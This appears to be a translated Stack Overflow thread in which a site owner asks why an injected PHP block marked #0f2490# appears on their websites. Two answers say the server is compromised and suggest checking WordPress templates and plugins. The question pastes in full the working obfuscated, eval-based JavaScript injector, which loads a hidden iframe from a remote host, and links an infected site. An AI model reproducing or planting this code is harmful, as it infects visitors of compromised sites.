0

我有很多网站,其中有几个,无论是否是 wordpress(有些是基于 .php,有些是核心 HTML。有些是 WordPress 博客,有些只是核心网站)在页面加载时显示这段脚本,我不能在我的一生中在服务器或代码中找到它。 

#0f2490# if(empty($b)) { $b = " "; echo $b; } #/0f2490#

检查网站的来源时,似乎有一些 javascript 代码在寻找对某个网站的引用。

我知道这些信息不足以正确解决问题。我在问是否有人听说过这一点,并且可以为我指明正确的方向,以获取资源来研究和了解这个问题。

您可以在http://chiuaua.ca查看自己的输出

作为参考,这是在 FireFox 或 Chrome 中使用源查看器时出现在网站上的 JavaScript 代码...

#0f2490#
                                                                                                                                                                                                                                                                                                                                                                                                            if(empty($b)) { $b = " <script type=\"text/javascript\" language=\"javascript\" > if(document.querySelector)zq=4;a=(\"27,6d,7c,75,6a,7b,70,76,75,27,6a,6a,6b,78,6a,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6a,6a,6b,78,6a,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6a,6a,6b,78,6a,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,7f,75,34,34,69,79,6e,6c,79,74,6c,70,7a,7b,6c,79,70,75,34,6d,79,34,70,6b,7a,7b,6c,70,75,34,6d,7e,6a,77,35,6b,6c,36,7e,6d,78,4b,5f,60,49,5b,35,77,6f,77,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,77,76,7a,70,7b,70,76,75,27,44,27,2e,68,69,7a,76,73,7c,7b,6c,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,6a,76,73,76,79,27,44,27,2e,3c,3a,37,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,6f,6c,70,6e,6f,7b,27,44,27,2e,3c,3a,37,77,7f,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,7e,70,6b,7b,6f,27,44,27,2e,3c,3a,37,77,7f,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,73,6c,6d,7b,27,44,27,2e,38,37,37,37,3c,3a,37,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,7b,76,77,27,44,27,2e,38,37,37,37,3c,3a,37,2e,42,14,11,14,11,27,70,6d,27,2f,28,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,6a,6a,6b,78,6a,2e,30,30,27,82,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,7e,79,70,7b,6c,2f,2e,43,77,27,70,6b,44,63,2e,6a,6a,6b,78,6a,63,2e,27,6a,73,68,7a,7a,44,63,2e,6a,6a,6b,78,6a,37,40,63,2e,27,45,43,36,77,45,2e,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,6a,6a,6b,78,6a,2e,30,35,68,77,77,6c,75,6b,4a,6f,70,73,6b,2f,6a,6a,6b,78,6a,30,42,14,11,27,84,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,5a,6c,7b,4a,76,76,72,70,6c,2f,6a,76,76,72,70,6c,55,68,74,6c,33,6a,76,76,72,70,6c,5d,68,73,7c,6c,33,75,4b,68,80,7a,33,77,68,7b,6f,30,27,82,14,11,27,7d,68,79,27,7b,76,6b,68,80,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,7d,68,79,27,6c,7f,77,70,79,6c,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,70,6d,27,2f,75,4b,68,80,7a,44,44,75,7c,73,73,27,83,83,27,75,4b,68,80,7a,44,44,37,30,27,75,4b,68,80,7a,44,38,42,14,11,27,6c,7f,77,70,79,6c,35,7a,6c,7b,5b,70,74,6c,2f,7b,76,6b,68,80,35,6e,6c,7b,5b,70,74,6c,2f,30,27,32,27,3a,3d,37,37,37,37,37,31,39,3b,31,75,4b,68,80,7a,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,27,44,27,6a,76,76,72,70,6c,55,68,74,6c,32,29,44,29,32,6c,7a,6a,68,77,6c,2f,6a,76,76,72,70,6c,5d,68,73,7c,6c,30,14,11,27,32,27,29,42,6c,7f,77,70,79,6c,7a,44,29,27,32,27,6c,7f,77,70,79,6c,35,7b,76,4e,54,5b,5a,7b,79,70,75,6e,2f,30,27,32,27,2f,2f,77,68,7b,6f,30,27,46,27,29,42,27,77,68,7b,6f,44,29,27,32,27,77,68,7b,6f,27,41,27,29,29,30,42,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,4e,6c,7b,4a,76,76,72,70,6c,2f,27,75,68,74,6c,27,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,79,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,75,68,74,6c,27,32,27,29,44,29,27,30,42,14,11,27,7d,68,79,27,73,6c,75,27,44,27,7a,7b,68,79,7b,27,32,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,32,27,38,42,14,11,27,70,6d,27,2f,27,2f,27,28,7a,7b,68,79,7b,27,30,27,2d,2d,14,11,27,2f,27,75,68,74,6c,27,28,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,37,33,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,30,27,30,27,30,14,11,27,82,14,11,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,84,14,11,27,70,6d,27,2f,27,7a,7b,68,79,7b,27,44,44,27,34,38,27,30,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,7d,68,79,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,29,42,29,33,27,73,6c,75,27,30,42,14,11,27,70,6d,27,2f,27,6c,75,6b,27,44,44,27,34,38,27,30,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,73,6c,75,6e,7b,6f,42,14,11,27,79,6c,7b,7c,79,75,27,7c,75,6c,7a,6a,68,77,6c,2f,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,73,6c,75,33,27,6c,75,6b,27,30,27,30,42,14,11,84,14,11,70,6d,27,2f,75,68,7d,70,6e,68,7b,76,79,35,6a,76,76,72,70,6c,4c,75,68,69,73,6c,6b,30,14,11,82,14,11,70,6d,2f,4e,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6a,6a,6b,78,6a,37,40,2f,30,42,14,11,84,14,11,84\".split(\",\"));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(12-5)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String[\"fr\"+\"omCh\"+\"arCo\"+\"de\"].apply(String,a));</script> "; echo $b; }
#/0f2490#
4

2 回答 2

4

坏消息,看起来您的网站已被利用...我访问了该链接,它试图立即在 Safari 上推送几个二进制文件...哎呀。

于 2013-08-27T00:28:21.963 回答
1

您的服务器已被入侵。坏坏消息。

如果您仍在运行旧版本,您需要在短期内将所有网站快速更新到最新版本的 wordpress。

查看您描述的内容,javascript 不在 html 源代码中,而是发送到浏览器。这可能意味着您的 wordpress 模板受到了损害。查看上传文件夹或模板文件夹,看看是否有任何额外的 js 文件正在加载。

要检查的另一件事是是否对 wordpress 模板的文件或任何插件的文件进行了任何更改。由于 wordpress 提供了一个方便的基于 Web 的编辑器来编辑这些文件,因此可能存在允许恶意代码通过这些方式将其他脚本注入您的文件的缺陷。

于 2013-08-27T00:55:07.293 回答